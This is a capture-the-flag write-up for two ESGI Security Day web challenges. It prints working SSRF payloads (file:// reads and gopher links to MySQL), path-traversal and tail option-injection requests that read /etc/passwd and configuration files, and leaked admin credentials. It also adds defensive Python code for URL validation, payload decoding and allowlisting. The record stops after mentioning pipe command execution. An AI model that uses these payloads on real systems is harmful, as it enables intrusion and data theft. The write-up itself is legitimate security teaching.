HackLab ESGI Security Day 7th Edition - Write-ups

Table of contents
  1. Information
    1. CTF
  2. 100 - Rookie - Web
  3. (unsolved) 350 - My Name is Rookie - Web

Information

CTF

  • Name: ESGI Security Day 7th Edition
  • Website: ctf.hacklab-esgi.org
  • Type: Online/On-site
  • Format: Jeopardy

100 - Rookie - Web

(▀̿Ĺ̯▀̿ ̿)

M0th3r > Hey, what? You were expecting the great, legendary M0th3r? Sorry to disappoint you. I hear you want to serve the cause? You found me, but it's not won yet. It's not a given that I'll take you under my wing.

Here, practise, and then maybe we'll see if you have what it takes to be a Cyber Pirate.

ctf.hacklab-esgi.org:8082

There is an SSRF; let's use it to dump the source code of the challenge:

curl -v 'file:///proc/self/cwd/index.php'

<?php
include_once "config_test.php";
?>

<html>
<head>
  <title>Super curling</title>
  <meta charset="utf-8" />
  <style type="text/css">
    body {
      text-align: center;
      background-color: #a0a0a0;
      font-family: "Gill Sans Extrabold", sans-serif;
    }
  </style>
</head>
<body>
  <h1>Website checker</h1>
  <p>Nous utilisons une nouvelle technologie parfaitement sûre pour tester vos divers sites internet. N'hésitez pas à nous donner du Dodgecoin!</p>
  <form action="index.php" method="post">
    URL Checker :
    <input type="text" name='url' />
  </form>
  <?php
  if (isset($_POST['url'])&&!empty($_POST['url']))
  {
    $url = $_POST['url'];
    $content_url = getUrlContent($url);
  }
  else
  {
    $content_url = "";
  }
  ?>
</body>
</html>

curl -v 'file:///proc/self/cwd/config_test.php'

<?php
// TODO: MySQL connection with "tiix" user and adding a MySQL password...

function getUrlContent($url){
  //$url = safe($url);
  $url = escapeshellarg($url);
  $pl = "curl -v ".$url;
  echo $pl;
  $content = shell_exec($pl);
  echo $content;
  return $content;
}
?>

The known escapeshellarg bypasses with curl are not so interesting here (see https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#curl): the argument is quoted correctly, the problem is that any URL scheme curl understands is accepted.
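The root cause in getUrlContent() is that the user-supplied URL reaches curl with no restriction on scheme or destination, which is exactly what makes file:// and gopher://127.0.0.1 usable. As an added example (my own Python, not the challenge's PHP nor anything from the write-up), here is the validation a "website checker" needs before fetching anything: a scheme allowlist and a check that every address the host resolves to is public. The function name is_safe_url and the injectable resolver parameter are my own choices; the resolver is injectable only so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Schemes a website checker legitimately needs. Everything else curl would
# accept (file://, gopher://, dict://, ftp://, ...) is refused up front.
ALLOWED_SCHEMES = {"http", "https"}


def _default_resolver(host):
    """Every address (IPv4 and IPv6) the hostname maps to, via the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _looks_like_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _is_public(address):
    """False for loopback (the local MySQL on 127.0.0.1), RFC 1918 ranges
    (hosts like 10.0.0.2), link-local (cloud metadata endpoints) and similar."""
    ip = ipaddress.ip_address(address)
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_url(url, resolver=_default_resolver):
    """True only for http(s) URLs whose host resolves solely to public addresses.

    `resolver` is a hypothetical hook for offline testing; a deployment keeps
    the default. A literal IP host is checked directly, a name is resolved and
    every returned address must pass (one internal A record is enough to fail).
    """
    try:
        parts = urlsplit(url)
    except ValueError:            # e.g. malformed IPv6 literal in brackets
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    if not host or parts.username or parts.password:
        return False              # empty host, or user:pass@host confusion tricks
    try:
        addresses = [host] if _looks_like_ip(host) else resolver(host)
    except (socket.gaierror, ValueError):
        return False
    return bool(addresses) and all(_is_public(a) for a in addresses)


if __name__ == "__main__":
    for candidate in ("file:///proc/self/cwd/index.php",
                      "gopher://127.0.0.1:3306/_%a3",
                      "http://10.0.0.2/", "http://93.184.216.34/"):
        print(candidate, "->", "allowed" if is_safe_url(candidate) else "refused")
```

This check is a precondition, not the whole fix: the fetch itself must also disable redirects (or re-validate each hop) and connect to the address that was validated, otherwise a redirect to http://127.0.0.1:3306 or a DNS answer that changes between check and fetch reopens the hole. Running curl through a shell at all is unnecessary here; an HTTP client library with the scheme and address checks above is the simpler design.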

Let's try MySQL command execution through a gopher SSRF thanks to PHP wrappers:

$ gopherus --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: \! id

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%06%00%00%00%03%5c%21%20%69%64%01%00%00%00%01

-----------Made-by-SpyD3r-----------

The gopher SSRF worked, but it seems command execution won't be possible: \! is a shell escape of the mysql command-line client, not something the server executes, so sent as a raw query it only produces an error. It did confirm that the server is 5.5.5-10.1.37-MariaDB-0+deb9u1 and that the tiix user works without a password.
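The gopherus link is opaque as printed, but it is just two things back to back: a MySQL HandshakeResponse41 (the client login packet) and a COM_QUERY packet, each prefixed by the 3-byte length and 1-byte sequence id of the MySQL wire protocol. As an added example (my own Python; not part of the write-up or of gopherus), here is a decoder for such a link, the kind of thing you want when one of these shows up in a proxy or web server log and you need to know what it would have done. The GOPHER_URL constant is the first link above, with its run of 23 %00 reserved bytes written as a repeat; the function names are mine, the capability flag values are the MySQL protocol's.

```python
from urllib.parse import unquote_to_bytes

# Capability flags from the MySQL client/server protocol.
CLIENT_MULTI_STATEMENTS = 0x00010000   # lets one COM_QUERY carry "USE ...; SELECT ..."
CLIENT_PLUGIN_AUTH      = 0x00080000   # login packet carries an auth plugin name
CLIENT_CONNECT_ATTRS    = 0x00100000   # login packet carries key/value attributes
COM_QUIT, COM_QUERY = 0x01, 0x03

# The first gopherus link from the write-up (user tiix, query "\! id"), split by field.
GOPHER_URL = (
    "gopher://127.0.0.1:3306/_"
    "%a3%00%00%01"                     # packet 1 header: length 0xa3, sequence id 1
    "%85%a6%ff%01%00%00%00%01%21"      # capabilities, max packet size, charset 33
    + "%00" * 23 +                     # 23 reserved zero bytes
    "%74%69%69%78%00"                  # "tiix\0"
    "%00"                              # auth response: length 0 (no password)
    "%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00"  # plugin name
    "%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65"
    "%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35"
    "%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32"
    "%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34"
    "%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c"
    "%06%00%00%00%03%5c%21%20%69%64"   # packet 2: COM_QUERY "\! id"
    "%01%00%00%00%01"                  # packet 3: COM_QUIT
)


def gopher_body(url):
    """Bytes curl sends for a gopher URL: the selector after 'host:port/',
    percent-decoded, minus its first character (the gopher item type, '_' here)."""
    selector = url.split("/", 3)[3]
    return unquote_to_bytes(selector[1:])


def split_packets(data):
    """Cut a MySQL byte stream into (sequence_id, payload) tuples."""
    packets, pos = [], 0
    while pos < len(data):
        if pos + 4 > len(data):
            raise ValueError("truncated packet header")
        length = int.from_bytes(data[pos:pos + 3], "little")
        payload = data[pos + 4:pos + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated packet payload")
        packets.append((data[pos + 3], payload))
        pos += 4 + length
    return packets


def _cstring(buf, pos):
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode(), end + 1


def _short_lenenc_string(buf, pos):
    # Length-encoded string; a single length byte suffices below 251, which holds here.
    n = buf[pos]
    return buf[pos + 1:pos + 1 + n].decode(), pos + 1 + n


def parse_handshake_response(payload):
    """Decode a HandshakeResponse41, the packet a client sends to log in."""
    caps = int.from_bytes(payload[0:4], "little")
    info = {"capabilities": caps,
            "max_packet": int.from_bytes(payload[4:8], "little"),
            "charset": payload[8]}
    pos = 9 + 23                                   # skip the reserved zero bytes
    info["user"], pos = _cstring(payload, pos)
    auth_len = payload[pos]                        # 1-byte length of the auth response
    info["auth_response"] = payload[pos + 1:pos + 1 + auth_len]
    pos += 1 + auth_len
    if caps & CLIENT_PLUGIN_AUTH:
        info["plugin"], pos = _cstring(payload, pos)
    info["attrs"] = {}
    if caps & CLIENT_CONNECT_ATTRS:
        total = payload[pos]                       # lenenc size of the attribute block
        pos += 1
        end = pos + total
        while pos < end:
            key, pos = _short_lenenc_string(payload, pos)
            info["attrs"][key], pos = _short_lenenc_string(payload, pos)
    if pos != len(payload):
        raise ValueError("login packet has %d unparsed bytes" % (len(payload) - pos))
    return info


def decode_gopher_mysql(url):
    """Return (login_info, commands) for a gopher-to-MySQL SSRF link."""
    packets = split_packets(gopher_body(url))
    login = parse_handshake_response(packets[0][1])
    commands = []
    for _, payload in packets[1:]:
        if payload[0] == COM_QUERY:
            commands.append(("COM_QUERY", payload[1:].decode()))
        elif payload[0] == COM_QUIT:
            commands.append(("COM_QUIT", ""))
        else:
            commands.append(("COM_0x%02x" % payload[0], payload[1:].hex()))
    return login, commands


if __name__ == "__main__":
    login, commands = decode_gopher_mysql(GOPHER_URL)
    print("user=%s plugin=%s auth=%r attrs=%s" % (login["user"], login["plugin"],
                                                   login["auth_response"], login["attrs"]))
    print("multi-statements:", bool(login["capabilities"] & CLIENT_MULTI_STATEMENTS))
    for name, arg in commands:
        print(name, arg)
```

Two details the decode makes visible: the auth response is empty, which is why gopherus insists the account must have no password (the link is a one-way stream, so the client cannot answer a server challenge), and CLIENT_MULTI_STATEMENTS is set in the capabilities, which is what allows the last payload on this page to send "USE securityday; SELECT flag FROM nothinghere" as a single COM_QUERY. Packets 1 and 3 also show why a passwordless database account reachable from the web server is the real defect: with a password set, this whole class of SSRF-to-MySQL links fails at login.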

Let's take a look at the current DB:

gopherus --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: SHOW DATABASES

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0f%00%00%00%03%53%48%4f%57%20%44%41%54%41%42%41%53%45%53%01%00%00%00%01

gopherus --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: SHOW TABLES from securityday

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1d%00%00%00%03%53%48%4f%57%20%54%41%42%4c%45%53%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%64%61%79%01%00%00%00%01

-----------Made-by-SpyD3r-----------

gopherus --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: SHOW COLUMNS FROM nothinghere FROM securityday

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2f%00%00%00%03%53%48%4f%57%20%43%4f%4c%55%4d%4e%53%20%46%52%4f%4d%20%6e%6f%74%68%69%6e%67%68%65%72%65%20%46%52%4f%4d%20%73%65%63%75%72%69%74%79%64%61%79%01%00%00%00%01

-----------Made-by-SpyD3r-----------

$ gopherus --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: USE securityday; SELECT flag FROM nothinghere

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2e%00%00%00%03%55%53%45%20%73%65%63%75%72%69%74%79%64%61%79%3b%20%53%45%4c%45%43%54%20%66%6c%61%67%20%46%52%4f%4d%20%6e%6f%74%68%69%6e%67%68%65%72%65%01%00%00%00%01

-----------Made-by-SpyD3r-----------

Flag was ESGI{W3lC0me_R00ki3_M0th3r_1s_0ld}.

(unsolved) 350 - My Name is Rookie - Web

(ง ͠° ͟ل͜ ͡°)ง

M0th3r > Something is bothering me. How could an Android pass the cyber pirates' test? Duke, the first of his kind, was not created by anyone from the government. He has since disappeared, and I want to find his core. If you want to help me, you have to pass the Cyber Pirates' test. It's the test Duke-083 passed with flying colours. Gather everything you can find on Zedcorp.

http = ctf.hacklab-esgi.org:5008 ssh = ctf.hacklab-esgi.org:5007

Warning: I didn't manage to get to the last part of the challenge.

$ curl http://ctf.hacklab-esgi.org:5008/robots.txt
User-agent: *
Disallow: /assets
Disallow: /js
Disallow: /api
Disallow: /logs
Disallow: /images

In the file http://ctf.hacklab-esgi.org:5008/logs/access.log we can see POST and GET requests to /0cc175b9c0f1b6a831c399e269772661/admin.php.

We also found http://ctf.hacklab-esgi.org:5008/login.php.

In access-details.log we get admin credentials: admin / pxrAW7a4HNMBw86bc.

On the admin dashboard there is a TODO list:

Todo

  • Finish log functionality.
    • Monitor login POST data from modsecurity log.
    • Create script to detect spam.
  • Implement contact functionality.
  • Create script to generate ssh key all 2 weeks.

We can also display 3 logs: access, error, and other vhosts access.

A typical request is:

$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=error.log'

Trying a path traversal (LFI), we get the file we want:

$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=../../../../../../../etc/passwd'

...

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
test:x:1001:1001:,,,:/home/test:/usr/sbin/nologin
trobin:x:1004:1004:Thibaud Robin,8,0145674356,0145674356,Trainee full stack developer:/home/trobin:/bin/bash

...

We may use trobin for ssh access.

Only the last 10 lines of the file are disclosed, so the log filename must be appended to a default tail command; hopefully we can append options to tail as well.

However, there is a filter: we can't send a semicolon (;) or a null byte (%00).

Let's try to disclose source of the challenge:

$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=../../../../../../../var/www/html/0cc175b9c0f1b6a831c399e269772661/admin.php -n 10000'
<?php
session_start();
if (!isset($_SESSION['logged'])) {
  header('Location: ../index.php');
  die();
}
?>

<!DOCTYPE HTML>
<html>
<head>
  <title>My Personnal Website - Admin</title>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
  <link rel="stylesheet" href="../assets/css/main.css" />
  <noscript><link rel="stylesheet" href="../assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload">

  <!-- Wrapper -->
  <div id="wrapper">

    <!-- Header -->
    <header id="header">
      <a href="../index.html" class="logo"><strong>My Personnal Website</strong></a>
      <nav>
        <a href="#menu">Menu</a>
      </nav>
    </header>

    <!-- Menu -->
    <nav id="menu">
      <ul class="links">
        <li><a href="../index.html">Home</a></li>
      </ul>
    </nav>

    <!-- Main -->
    <div id="main" class="alt" style="border-color:transparent;">

      <!-- One -->
      <section id="one">
        <div class="inner">
          <header class="major">
            <h1>Admin panel</h1>
          </header>

          <!-- Content -->
          <h4>Todo</h4>
          <ol>
            <li>Finish log functionality.</li>
            <ul style="margin:0 0 0 0">
              <li>Monitor login POST data from modsecurity log.</li>
              <li>Create script to detect spam.</li>
            </ul>
            <li>Implement contact functionality.</li>
            <li>Create script to generate ssh key all 2 weeks.</li>
          </ol>

          <hr>

          <h4>Log</h4>
          <form method="post" action="#">
            <div class="col-4 col-12-small">
              <input type="radio" name="log" id="access" value="access.log" checked>
              <label for="access">Access</label>
            </div>
            <div class="col-4 col-12-small">
              <input type="radio" name="log" id="error" value="error.log">
              <label for="error">Error</label>
            </div>
            <div class="col-4 col-12-small">
              <input type="radio" name="log" id="vhost" value="other_vhosts_access.log">
              <label for="vhost">Other vhosts access</label>
            </div>
            <br>
            <input type="submit" value="Show" class="secondary" />
          </form>

          <?php
          if (isset($_POST['log']) && !empty($_POST['log'])) {

            if (preg_match("/[\"'-,;#]+/", $_POST['log'])) {
              echo "<p><strong style='color:#e74c3c;'>Error : use of forbidden chars...</strong></p>";

            } else {
              $cmd = "tail -n 10 /var/log/apache2/" . $_POST['log'];
              echo "<pre><code>";
              system($cmd . " &");
              echo "</code></pre>";
            }
          }
          ?>
        </div>
      </section>

    </div>
  </div>

  <!-- Scripts -->
  <script src="../assets/js/jquery.min.js"></script>
  <script src="../assets/js/jquery.scrolly.min.js"></script>
  <script src="../assets/js/jquery.scrollex.min.js"></script>
  <script src="../assets/js/browser.min.js"></script>
  <script src="../assets/js/breakpoints.min.js"></script>
  <script src="../assets/js/util.js"></script>
  <script src="../assets/js/main.js"></script>

</body>
</htm>

The filtering regex is the following: preg_match("/[\"'-,;#]+/", $_POST['log']). Note that '-, inside the character class is a range from ' (0x27) to , (0x2C), so the filter rejects " ' ( ) * + , ; and # but nothing else: the dash itself, spaces, slashes and the pipe all pass through, which is why extra tail options can be appended to the log name.
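The lesson from this filter is the usual one: a character blocklist in front of a shell command is guesswork, while an allowlist of the three log names the form actually offers, passed as an argv list with no shell, leaves nothing to bypass. As an added example (my own Python, not the challenge's PHP), the code below evaluates the dumped regex to show exactly which characters it covers, then implements the allowlist version. The names blocked_by_filter, filtered_characters, build_tail_argv and show_log are mine.

```python
import re
import string
import subprocess

# The filter exactly as dumped from admin.php; Python's re reads this class the same
# way PCRE does, with '-, as a range rather than a literal dash.
BLOCKLIST = re.compile(r"[\"'-,;#]+")

LOG_DIR = "/var/log/apache2/"
# The only values the admin form offers. Anything else is refused, so a traversal
# sequence or a trailing option never reaches a command line.
ALLOWED_LOGS = {"access.log", "error.log", "other_vhosts_access.log"}


def blocked_by_filter(value):
    """True when the challenge's blocklist would reject `value`."""
    return BLOCKLIST.search(value) is not None


def filtered_characters():
    """Every printable ASCII character the class actually matches."""
    return {c for c in string.printable if BLOCKLIST.search(c)}


def build_tail_argv(log_name):
    """Hardened replacement: validate against the fixed set, then return an argv list
    so no shell ever parses the value. Raises ValueError for anything not listed."""
    if log_name not in ALLOWED_LOGS:
        raise ValueError("unknown log name: %r" % log_name)
    return ["tail", "-n", "10", LOG_DIR + log_name]


def show_log(log_name):
    """Run the validated tail without a shell (no /bin/sh is involved, so no
    pipes, separators or option injection are possible) and return its output."""
    return subprocess.run(build_tail_argv(log_name), capture_output=True,
                          text=True, check=False).stdout


if __name__ == "__main__":
    print("characters the blocklist rejects:", "".join(sorted(filtered_characters())))
    for candidate in ("error.log", "error.log -n 10000", "error.log; id"):
        print("%-22s blocklist: %-5s allowlist: %s" % (
            candidate, "block" if blocked_by_filter(candidate) else "pass",
            "ok" if candidate in ALLOWED_LOGS else "refused"))
```

Dropping the trailing " &" from the original is part of the fix as well: backgrounding the command discards its exit status and makes the response independent of the actual output, which is why the page shows only what happened to be flushed in time.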

I can also dump login.php:

<?php
session_start();
?>

<!DOCTYPE HTML>
<html>
<head>
  <title>Elements - Forty by HTML5 UP</title>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
  <link rel="stylesheet" href="assets/css/main.css" />
  <noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload">

  <!-- Wrapper -->
  <div id="wrapper">

    <!-- Header -->
    <header id="header">
      <a href="index.php" class="logo"><strong>My Personnal Website</strong></a>
      <nav>
        <a href="#menu">Menu</a>
      </nav>
    </header>

    <!-- Menu -->
    <nav id="menu">
      <ul class="links">
        <li><a href="index.php">Home</a></li>
      </ul>
    </nav>

    <!-- Main -->
    <div id="main" class="alt" style="border-color:transparent;">

      <!-- One -->
      <section id="one">
        <div class="inner">
          <header class="major">
            <h1>Authentication</h1>
          </header>

          <?php
          if (isset($_POST['username']) && isset($_POST['password'])) {
            $username = htmlentities($_POST['username']);
            $password = htmlentities($_POST['password']);

            if ($username === "admin" && $password === "pxrAW7a4HNMBw86bc") {
              $_SESSION['logged'] = 1;
              header('Location: 0cc175b9c0f1b6a831c399e269772661/admin.php');

            } else if (preg_match("/[\"'-,#]+/", "$username $password")) {
              echo "<p><strong style='color:#e74c3c;'>Hey ! Do you try to hack me ?!</strong></p>";
            } else {
              echo "<p><strong style='color:#e74c3c;'>Error : incorrect credentials !</strong></p>";
            }
          }
          ?>

          <form method="post" action="login.php">
            <div class="row gtr-uniform">
              <div class="col-10">
                <input type="text" name="username" value="" placeholder="Username" />
              </div>
              <div class="col-10">
                <input type="password" name="password" value="" placeholder="Password" />
              </div>
              <div class="" lass="col-12">
                <input type="submit" value="Connection" class="primary" />
              </div>
            </div>
          </form>
        </div>
      </section>

    </div>
  </div>

  <!-- Scripts -->
  <script src="assets/js/jquery.min.js"></script>
  <script src="assets/js/jquery.scrolly.min.js"></script>
  <script src="assets/js/jquery.scrollex.min.js"></script>
  <script src="assets/js/browser.min.js"></script>
  <script src="assets/js/breakpoints.min.js"></script>
  <script src="assets/js/util.js"></script>
  <script src="assets/js/main.js"></script>

</body>
</html>

Let's see /etc/hosts to find info on Zedcorp.

127.0.0.1       localhost
127.0.1.1       dev-server

10.0.0.1        dev-server      dev-server.zedcorp
10.0.0.2        project-server  project-server.zedcorp
10.0.0.3        admin-server    admin-server.zedcorp

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

And reading /proc/self/environ:

APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=8:11700
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=82b54f38b32a4bbb8c9fd813d21543f6
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/0cc175b9c0f1b6a831c399e269772661

The apache configuration (/etc/apache2/apache2.conf) may help us:

...

LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf

# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# Enable the module.
SecRuleEngine On
SecAuditEngine RelevantOnly

# Setup logging in a dedicated file.
SecAuditLog /var/log/apache2/access-details.log

# Allow it to access requests body.
SecRequestBodyAccess on
SecAuditLogParts ABIFHZ

# Setup default action.
SecDefaultAction "nolog,noauditlog,allow,phase:2"

# Define the rule that will log the content of POST requests.
SecRule REQUEST_METHOD "POST" "id:800000,phase:2,t:none,pass,nolog,auditlog"

# Can read the logs on /logs
<Directory /var/www/html/logs>
  SecRuleEngine Off
</Directory>

# Authorize command injection on admin.php
<Directory /var/www/html/0cc175b9c0f1b6a831c399e269772661/admin.php>
  SecRuleEngine Off
</Directory>

We can also execute commands with a pipe (|):

